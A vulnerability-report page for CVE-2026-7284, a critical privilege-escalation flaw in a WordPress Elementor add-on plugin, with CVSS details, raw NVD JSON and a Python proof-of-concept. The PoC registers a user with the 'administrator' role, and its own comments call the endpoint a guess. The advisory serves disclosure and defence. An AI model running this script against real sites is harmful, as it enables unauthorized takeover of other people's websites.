Security Vulnerability Report
CVE-2026-7284 CVSS 9.8 CRITICAL

CVE-2026-7284

Published: 2026-05-20 02:16:39
Last Modified: 2026-05-20 13:54:55

Description

The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Easy Elements for Elementor <= 1.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
import requests


def exploit(target_url, username, email):
    # Target endpoint might be /wp-admin/admin-ajax.php or a specific custom route
    # Based on the function name 'easyel_handle_register', it's likely an action.
    url = f"{target_url}/wp-admin/admin-ajax.php"
    payload = {
        "action": "easyel_handle_register",  # Generic guess based on function name
        "user_login": username,
        "user_email": email,
        "role": "administrator"  # The vulnerable parameter
    }
    try:
        response = requests.post(url, data=payload)
        if response.status_code == 200:
            print(f"[+] Potential success. Check if user {username} was created as admin.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = "http://target-site.com"
    exploit(target, "hacker_admin", "[email protected]")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7284", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:39.083", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.0/widgets/login-register/class.login-register.php#L62", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3534530/easy-elements#file728", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/32b6ccfe-a659-41e4-9cec-146f4f910071?source=cve", "source": "[email protected]"}]}}